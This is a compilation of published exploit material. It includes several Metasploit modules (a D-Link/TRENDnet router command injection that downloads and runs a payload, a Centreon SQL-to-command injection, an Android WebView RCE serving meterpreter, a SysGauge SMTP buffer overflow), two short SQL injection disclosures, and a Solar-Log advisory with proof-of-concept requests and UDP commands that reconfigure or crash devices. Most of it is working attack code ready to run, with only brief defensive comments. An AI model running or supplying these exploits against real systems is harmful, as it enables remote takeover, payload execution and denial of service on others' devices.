##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking # Only tested on Emulated environment
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and datastore options.
  #
  # Injection point: the ping_addr POST parameter of the ncc ping handler at
  # TARGETURI (default /ping.ccp), wrapped as $(...) by #exec_command.
  # For defenders: requests to that path whose ping_addr value contains
  # "$(" or "${IFS}" are the signature of this module's traffic.
  #
  # @param info [Hash] module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'D-Link/TRENDnet NCC Service Command Injection',
      'Description' => %q{
This module exploits a remote command injection vulnerability on several routers. The
vulnerability exists in the ncc service, while handling ping commands. This module has
been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices
are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L
(Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link
DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)
v2.01b01
},
      'Author' =>
        [
          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
          'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2015-1187'],
          ['BID', '72816'],
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
          ['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
        ],
      'Targets' =>
        # Only tested on D-Link DIR-626L where wget is available
        [
          [ 'Linux mipsel Payload',
            {
              'Arch' => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ],
          [ 'Linux mipsbe Payload',
            {
              'Arch' => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
        ],
      'DisclosureDate' => 'Feb 26 2015',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
        OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
      ], self.class)
  end

  # Fingerprints the target web server.
  #
  # Sends a GET to TARGETURI. Returns CheckCode::Detected when the reply is an
  # HTTP 500 carrying a Server header matching /mini_httpd/ -- this identifies
  # the server software, not the injection itself, which is why the result is
  # Detected rather than Vulnerable. Any other reply, and a connection error,
  # yield CheckCode::Unknown.
  #
  # @return [Exploit::CheckCode]
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path)
      })
      # unknown if other devices also using mini_httpd
      if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  # Delivers +cmd+ through the ncc ping handler.
  #
  # The command is wrapped as $(cmd) in the ping_addr field of a POST to
  # TARGETURI with 'ccp_act' => 'ping_v6'. encode_params is disabled so the
  # "$(" and ")" characters reach the device unencoded.
  #
  # @param cmd [String] command text to inject
  # @param timeout [Integer] seconds to wait for the HTTP response (default 20)
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when none
  #   arrived in time (callers treat nil as failure)
  # @note aborts the module via fail_with(Failure::Unreachable) when
  #   ::Rex::ConnectionError is raised
  def exec_command(cmd, timeout = 20)
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'encode_params' => false,
        'vars_post' => {
          'ccp_act' => 'ping_v6',
          'ping_addr' => '$(' + cmd + ')'
        }
      }, timeout)
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  # HTTP-server hook (presumably invoked by the HttpServer mixin once the
  # server started by +super+ in #exploit is listening -- framework convention,
  # not visible here). Points the download URL at this module's own resource
  # and asks the device to fetch it.
  def primer
    @payload_url = get_uri
    wget_payload
  end

  # Main flow.
  #
  # 1. Re-runs #check and aborts with Failure::NoTarget unless it returns
  #    Detected.
  # 2. Builds the ELF payload (@pl) and chooses a random 3..7 character
  #    filename (@dropped_elf) for it under WRITABLEDIR.
  # 3. EXTURL blank: runs the module's own HTTP server via +super+ for at most
  #    HTTPDELAY seconds; the Timeout::Error that ends it is swallowed on
  #    purpose, and #primer performs the download during that window.
  #    EXTURL set: the device is told to fetch from EXTURL instead.
  # 4. Makes the dropped file executable and runs it.
  def exploit
    print_status("Accessing the vulnerable URL...")
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
    end
    print_status("Exploiting...")
    @pl = generate_payload_exe
    @payload_url = ''
    @dropped_elf = rand_text_alpha(rand(5) + 3)
    if datastore['EXTURL'].blank?
      begin
        # Stop serving after HTTPDELAY seconds; the timeout is the intended exit.
        Timeout.timeout(datastore['HTTPDELAY']) { super }
      rescue Timeout::Error
      end
      chmod_payload
      exec_payload
    else
      @payload_url = datastore['EXTURL']
      wget_payload
      chmod_payload
      exec_payload
    end
  end

  # Asks the device to download @payload_url into WRITABLEDIR/@dropped_elf.
  #
  # ${IFS} stands in for every space of the injected wget command line
  # (presumably because literal spaces do not survive in the ping_addr value).
  # An HTTP 200 reply with a mini_httpd Server header is taken as success and
  # the dropped file is registered for cleanup; anything else aborts with
  # Failure::Unknown.
  def wget_payload
    upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
    cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"
    print_status("Downloading the payload to the target machine...")
    res = exec_command(cmd)
    if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
      register_files_for_cleanup(upload_path)
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
    end
  end

  # Makes the dropped file executable (mode 777) using a 1-second response
  # timeout; a nil response (no reply within that second) aborts with
  # Failure::Unknown. The trailing Rex.sleep(1) presumably gives the device
  # time to finish before the next command is sent.
  def chmod_payload
    cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
    print_status("chmod the payload...")
    res = exec_command(cmd, 1)
    unless res
      fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
    end
    Rex.sleep(1)
  end

  # Runs the dropped file by its full path, again with a 1-second timeout;
  # a nil response aborts with Failure::Unknown.
  def exec_payload
    cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
    print_status("Executing the payload...")
    res = exec_command(cmd, 1)
    unless res
      fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
    end
    Rex.sleep(1)
  end

  # Handle incoming requests to the HTTP server
  #
  # Serves the ELF (@pl) to any request whose URI matches the resource path
  # from get_resource (escaped, but unanchored). Other requests are logged and
  # get no response from this method.
  #
  # @param cli [Object] client connection handed over by the server mixin
  # @param request [Object] parsed HTTP request (only +uri+ is read)
  def on_request_uri(cli, request)
    print_status("Request: #{request.uri}")
    if request.uri =~ /#{Regexp.escape(get_resource)}/
      print_status('Sending payload...')
      send_response(cli, @pl)
    end
  end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options.
  #
  # Both injection points are GET parameters of
  # include/views/graphs/graphStatus/displayServiceStatus.php under TARGETURI:
  # session_id (see #check) and template_id (UNION-based, see #exploit).
  # For defenders: a quote character or "UNION ALL SELECT" inside either
  # parameter in requests to that script is the indicator.
  #
  # @param info [Hash] module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Centreon SQL and Command Injection',
      'Description' => %q{
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
injection in the displayServiceStatus.php component, it is possible to execute arbitrary
commands as long as there is a valid session registered in the centreon.session table.
In order to have a valid session, all it takes is a successful login from anybody.
The exploit itself does not require any authentication.
This module has been tested successfully on Centreon Enterprise Server 2.2.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'MaZ', # Vulnerability Discovery and Analysis
          'juan vazquez' # Metasploit Module
        ],
      'References' =>
        [
          ['CVE', '2014-3828'],
          ['CVE', '2014-3829'],
          ['US-CERT-VU', '298796'],
          ['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
        ],
      'Arch' => ARCH_CMD,
      'Platform' => 'unix',
      'Payload' =>
        {
          'Space' => 1500, # having into account 8192 as max URI length
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl'
            }
        },
      'Targets' =>
        [
          ['Centreon Enterprise Server 2.2', {}]
        ],
      'Privileged' => false,
      'DisclosureDate' => 'Oct 15 2014',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon'])
      ], self.class)
  end

  # Three-state check.
  #
  # 1. Sends a random 5..12 digit session_id. Unless the reply is HTTP 200
  #    with Content-Type image/gif, the component is assumed absent -> Safe.
  # 2. Sends the same id followed by a tautology ("' or 'a'='a"). A body
  #    containing "sh: graph: command not found" shows the injected SQL changed
  #    what reached a shell -> Vulnerable. An image/gif reply again -> Detected
  #    (injection present but not observable -- possibly an empty
  #    centreon.session table, see the message in #exploit). Anything else
  #    -> Safe.
  #
  # @return [Exploit::CheckCode]
  def check
    random_id = rand_text_numeric(5 + rand(8))
    res = send_session_id(random_id)
    unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
      return Exploit::CheckCode::Safe
    end
    injection = "#{random_id}' or 'a'='a"
    res = send_session_id(injection)
    if res && res.code == 200
      if res.body && res.body.to_s =~ /sh: graph: command not found/
        return Exploit::CheckCode::Vulnerable
      elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
        return Exploit::CheckCode::Detected
      end
    end
    Exploit::CheckCode::Safe
  end

  # Main flow.
  #
  # NOTE: #check is invoked up to twice below (once per branch of the
  # condition), so the Safe/Detected decision may be based on two separate
  # request pairs with different random ids.
  #
  # Builds a fresh tautology for session_id and a UNION ALL SELECT for
  # template_id whose sixth column is CHAR(59, <payload bytes>, 59) -- 59 is
  # ';' -- so the payload is delimited on both sides. The response body is
  # printed (verbose) when it contains "sh: --imgformat: command not found".
  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
    elsif check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?")
    end
    print_status("Exploiting...")
    random_id = rand_text_numeric(5 + rand(8))
    random_char = rand_text_alphanumeric(1)
    session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
    template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
    res = send_template_id(session_injection, template_injection)
    if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
      vprint_status("Output: #{res.body}")
    end
  end

  # GET displayServiceStatus.php with only session_id set.
  #
  # @param session_id [String] value for the session_id parameter
  # @return [Rex::Proto::Http::Response, nil] the response, nil if none
  def send_session_id(session_id)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
      'vars_get' =>
        {
          'session_id' => session_id
        }
    )
    res
  end

  # GET displayServiceStatus.php with session_id and template_id set,
  # waiting at most 3 seconds for the reply.
  #
  # @param session_id [String] value for the session_id parameter
  # @param template_id [String] value for the template_id parameter
  # @return [Rex::Proto::Http::Response, nil] the response, nil if none
  def send_template_id(session_id, template_id)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
      'vars_get' =>
        {
          'session_id' => session_id,
          'template_id' => template_id
        }
    }, 3)
    res
  end

  # Encodes payload.encoded as decimal byte values, each followed by a comma
  # (e.g. "104,105,"), for use inside a MySQL CHAR() call. The trailing comma
  # is relied upon by the template_injection string in #exploit.
  #
  # @return [String]
  def mysql_payload
    p = ''
    payload.encoded.each_byte { |c| p << "#{c},"}
    p
  end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/android'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Android

  # Browser-side vulnerability probe: walks every property of +top+ and sets
  # is_vuln when one of them exposes getClass() -- i.e. a Java object was
  # injected into the page via addJavascriptInterface. Errors are swallowed
  # so non-Java properties are skipped. Used both for autopwn and as the
  # BrowserRequirements :vuln_test below.
  VULN_CHECK_JS = %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
  autopwn_info(
    :os_name => OperatingSystems::Match::ANDROID,
    :arch => ARCH_ARMLE,
    :javascript => true,
    :rank => ExcellentRanking,
    :vuln_test => VULN_CHECK_JS
  )

  # Module metadata.
  #
  # Mitigation context (from the Description): the issue is fixed in Android
  # 4.2 and later; WebViews that expose Java objects to untrusted content
  # over plain HTTP, or pages with XSS, remain the exposure.
  #
  # @param info [Hash] module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
      'Description' => %q{
This module exploits a privilege escalation issue in Android < 4.2's WebView component
that arises when untrusted Javascript code is executed by a WebView that has one or more
Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
APIs exposed by the Interface and execute arbitrary commands.
Some distributions of the Android Browser app have an addJavascriptInterface
call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
4.1.2 release of Android is known to be vulnerable.
A secondary attack vector involves the WebViews embedded inside a large number
of Android applications. Ad integrations are perhaps the worst offender here.
If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
into the page displayed in the WebView, then you can inject the html/js served
by this module and get a shell.
Note: Adding a .js to the URL will return plain javascript (no HTML markup).
},
      'License' => MSF_LICENSE,
      'Author' => [
        'jduck', # original msf module
        'joev' # static server
      ],
      'References' => [
        ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
        ['URL', 'http://50.56.33.56/blog/?p=314'],
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
        ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
        ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
        ['EDB', '31519'],
        ['OSVDB', '97520']
      ],
      'Platform' => ['android', 'linux'],
      'Arch' => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
      'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
      'Targets' => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => 'Dec 21 2012',
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source => 'script',
        :os_name => OperatingSystems::Match::ANDROID,
        :vuln_test => VULN_CHECK_JS,
        :vuln_test_error => 'No vulnerable Java objects were found in this web context.'
      }
    ))
    deregister_options('JsObfuscate')
  end

  # Hooked to prevent BrowserExploitServer from attempting to do JS detection
  # on requests for the static javascript file
  #
  # NOTE: the pattern /\.js/ is unanchored, so any URI containing ".js"
  # anywhere is routed to #serve_static_js; everything else goes to the
  # mixin's handler via +super+.
  #
  # @param cli [Object] client connection
  # @param req [Object] parsed HTTP request
  def on_request_uri(cli, req)
    if req.uri =~ /\.js/
      serve_static_js(cli, req)
    else
      super
    end
  end

  # The browser appears to be vulnerable, serve the exploit
  #
  # @param cli [Object] client connection
  # @param req [Object] parsed HTTP request (unused here)
  # @param browser [Hash] profile gathered by the mixin; only :arch is read
  def on_request_exploit(cli, req, browser)
    arch = normalize_arch(browser[:arch])
    print_status "Serving #{arch} exploit..."
    send_response_html(cli, html(arch))
  end

  # Called when a client requests a .js route.
  # This is handy for post-XSS.
  #
  # With an +arch+ query parameter the arch-specific script is served; the
  # value is passed through #normalize_arch, so an unsupported value falls
  # back to DEFAULT_ARCH. Without it the arch-detection stub is served.
  # Both responses carry Content-type text/javascript.
  #
  # @param cli [Object] client connection
  # @param req [Object] parsed HTTP request (qstring['arch'] is read)
  def serve_static_js(cli, req)
    arch = req.qstring['arch']
    response_opts = { 'Content-type' => 'text/javascript' }
    if arch.present?
      print_status("Serving javascript for arch #{normalize_arch arch}")
      send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
    else
      print_status("Serving arch detection javascript")
      send_response(cli, static_arch_detect_js, response_opts)
    end
  end

  # This is served to requests for the static .js file.
  # Because we have to use javascript to detect arch, we have 3 different
  # versions of the static .js file (x86/mips/arm) to choose from. This
  # small snippet of js detects the arch and requests the correct file.
  #
  # Detection is a regex match on navigator.platform; the follow-up script
  # URL is get_uri plus a random 5-letter name ending in .js and an arch=
  # query string. The appendChild is deferred by 100 ms so document.body
  # (or document.head) exists.
  #
  # @return [String] JavaScript source
  def static_arch_detect_js
    %Q|
var arches = {};
arches['#{ARCH_ARMLE}'] = /arm/i;
arches['#{ARCH_MIPSLE}'] = /mips/i;
arches['#{ARCH_X86}'] = /x86/i;
var arch = null;
for (var name in arches) {
if (navigator.platform.toString().match(arches[name])) {
arch = name;
break;
}
}
if (arch) {
// load the script with the correct arch
var script = document.createElement('script');
script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
script.setAttribute('type', 'text/javascript');
// ensure body is parsed and we won't be in an uninitialized state
setTimeout(function(){
var node = document.body \|\| document.head;
node.appendChild(script);
}, 100);
}
|
  end

  # @return [String] normalized client architecture
  #
  # @param arch [String] requested architecture; kept as-is when listed in
  #   SUPPORTED_ARCHES, otherwise replaced by DEFAULT_ARCH (both constants
  #   presumably come from Msf::Exploit::Android -- not defined in this file)
  def normalize_arch(arch)
    if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
  end

  # Wraps the arch-specific script in a minimal HTML document.
  #
  # @param arch [String] normalized architecture
  # @return [String] HTML page
  def html(arch)
    "<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>"
  end
end
# # # # #
# Exploit Title: Flippa Clone - SQL Injection
# Google Dork: N/A
# Date: 23.03.2017
# Vendor Homepage: http://www.snobscript.com/
# Software: http://www.snobscript.com/downloads/flippa-clone/
# Demo: http://flippaportal.scriptfirm.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/domain-details/[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/site-details/[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/ask-a-question/[SQL]
# Etc...
# # # # #
###############################################################################################
# Exploit Title: Joomla Modern Booking - SQL Injection
# Author: [ Hamed Izadi ]
#IRAN
# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017
# PoC:
# coupon Parameter Vulnerable To SQLi
# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking
# L u Arg
###############################################################################################
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::TcpServer
  Rank = NormalRanking

  # Module metadata and options.
  #
  # This is a server-side module: it listens on SRVPORT (default 25) and
  # answers the first thing a connecting SysGauge client sees -- the SMTP
  # 220 greeting -- with an over-long line (see #on_client_connect).
  # BadChars excludes NUL, LF, CR and space, presumably because the greeting
  # is parsed as a whitespace/CRLF-delimited SMTP line.
  def initialize()
    super(
      'Name' => 'SysGauge SMTP Validation Buffer Overflow',
      'Description' => %q{
This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client, resulting in an unprivileged shell.
},
      'Author' =>
        [
          'Chris Higgins', # msf Module -- @ch1gg1ns
          'Peter Baris' # Initial discovery and PoC
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'EDB', '41479' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload' =>
        {
          'Space' => 306,
          'BadChars' => "\x00\x0a\x0d\x20"
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows Universal',
            {
              'Offset' => 176,
              'Ret' => 0x6527635E # call esp # QtGui4.dll
            }
          ]
        ],
      'Privileged' => false,
      'DisclosureDate' => 'Feb 28 2017',
      'DefaultTarget' => 0
    )
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
      ])
  end

  # TcpServer hook: builds and sends the crafted 220 greeting as soon as a
  # client connects.
  #
  # Layout, in order: "220 ", target['Offset'] random bytes, the payload
  # from byte 232 onward, 2 random bytes, target.ret packed little-endian
  # ('V'), 12 random bytes, 8 NOPs, the payload's first 232 bytes, then
  # "ESMTP Sendmail \r\n". The original comments below explain the split.
  #
  # @param c [Object] connected client socket (peerhost is read, put is called)
  def on_client_connect(c)
    # Note here that the payload must be split into two parts.
    # The payload gets jumbled in the stack so we need to split
    # and align to get it to execute correctly.
    sploit = "220 "
    sploit << rand_text(target['Offset'])
    # Can only use the last part starting from 232 bytes in
    sploit << payload.encoded[232..-1]
    sploit << rand_text(2)
    sploit << [target.ret].pack('V')
    sploit << rand_text(12)
    sploit << make_nops(8)
    # And the first part up to 232 bytes
    sploit << payload.encoded[0..231]
    sploit << "ESMTP Sendmail \r\n"
    print_status("Client connected: " + c.peerhost)
    print_status("Sending payload...")
    c.put(sploit)
  end
end
SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=======================================================================
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://www.solar-log.com/de/home.html
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring systems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and
Jörg Karwath and was created from the company "TOP Solare Datensysteme". This
company had been developing and selling the "SolarLog™" product range since
2005. Our core competence covers innovative products with short development
cycles and an excellent cost/performance ratio. Our developments have the
outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."
Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html
Business recommendation:
------------------------
SEC Consult recommends installing the available firmware update immediately
and restricting network access.
Furthermore, this device should not be used in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.
An attacker can download the configuration file without authentication and
extract the password to log in to Solar-Log. Therefore, an attacker can gain
administrative access to such a device without prior authentication.
2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.
A CSRF vulnerability enables an attacker to remove/modify a password of a
device by luring an authenticated user to click on a crafted link. An attacker
is able to take over the device by exploiting this vulnerability.
3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.
Any files can be uploaded on the Solar-Log by using a crafted POST request. An
attacker can start a malicious website or use the Solar-Log as share to store
any (illegal) contents.
4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)
The network configuration of the internal network including the gateway and
the MAC address of the device are leaked.
All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS
version and serial number are leaked as well.
5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)
Since the Solar-Log is based on Beck IPC chips, a UDP configuration
server is enabled by default. This server allows the IP configuration to be changed
over a specific UDP port. This functionality can be protected with a password,
but no password is set in the affected firmware versions.
The MAC address, which is leaked by 4), is needed to configure the device.
An attacker can reconfigure the device without any authentication.
6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)
The Beck IPC UDP configuration server on Solar-Log device can be attacked with
arbitrary UDP packets to permanently disable the Solar-Log until a manual
reboot is triggered.
7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)
Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip
over the network via UDP, a missing password can also enable an attacker to do
this on a Solar-Log device. This action can lead to a simple Denial of Service
or a complex botnet of Solar-Log devices!
Proof of concept:
-----------------
1) Unauthenticated Download of Configuration including Device-Password
The full configuration is exposed by sending the following GET-request:
-------------------------------------------------------------------------------
GET /data/misc.dat HTTP/1.1
Host: <IP-Address>
[...]
-------------------------------------------------------------------------------
Since the response contains the password, an attacker can easily take
control over the device.
2) Cross-Site Request Forgery
By luring the user to issue the following request, the password is removed:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>
preval=none;postval=105;{"221":"0","223":"0","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------
By luring the user to issue the following request, the password is modified:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>
preval=none;postval=105;{"221":"0","223":"1","224":"<New-Password>","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------
3) Unauthenticated Arbitrary File Upload
Any files can be uploaded by using the following POST-request:
-------------------------------------------------------------------------------
POST /menu/d_debug_db.html HTTP/1.1
Host: <IP-Address>
[...]
Referer: http://<IP-Address>/menu/d_debug_db.html
Content-Type: multipart/form-data; boundary=--------301473270
Content-Length: 341
----------301473270
Content-Disposition: form-data; name="DESTINATION-PATH"
PoC.html
----------301473270
Content-Disposition: form-data; name="FILE-CONTENT"; filename="file.txt"
Content-Type: text/plain
<html>
<head>
<title>SEC-Test</title>
</head>
<body>
<script>alert("XSS-PoC");</script>
</body>
</html>
----------301473270
Content-Disposition: form-data; name="L_UPLOAD"
Hochladen
----------301473270--
-------------------------------------------------------------------------------
The uploaded content can be reached by this link:
http://<IP-Address>/PoC.html
4) Information Disclosure (CVE-2001-1341)
This vulnerability is a known issue to IPC@CHIP since 2001.
See: https://www.securityfocus.com/bid/2767/info
The following URL can be used to open the "ChipCfg" file on a Solar-Log device:
http://<IP-Address>/ChipCfg
If an attacker is in the same subnet, he can directly request this information
from the device (the device responds to multicast) with the following command:
$ echo -n "0 1 A" >/dev/udp/<Target-IP>/8001
5) Unauthenticated Change of Network-Configuration
By using the following command, a change of the network configuration can be
triggered without authentication on UDP port 8001:
$ echo -n "<MAC> 4 2 0 <Desired-IP-Address> <Desired-Netmask> <Desired-Gateway>" >/dev/udp/<Target-IP>/8001
Example:
$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254" >/dev/udp/192.168.4.9/8001
6) Unauthenticated Denial of Service
By using arbitrary null characters the IPC@CHIP can be pushed into an
undesired state:
$ echo -n "<MAC> 0 <IP-Address> <Netmask> <Gateway> DDDD\0\0" >/dev/udp/<Target-IP>/8001
Example:
$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD\0\0" >/dev/udp/192.168.4.5/8001
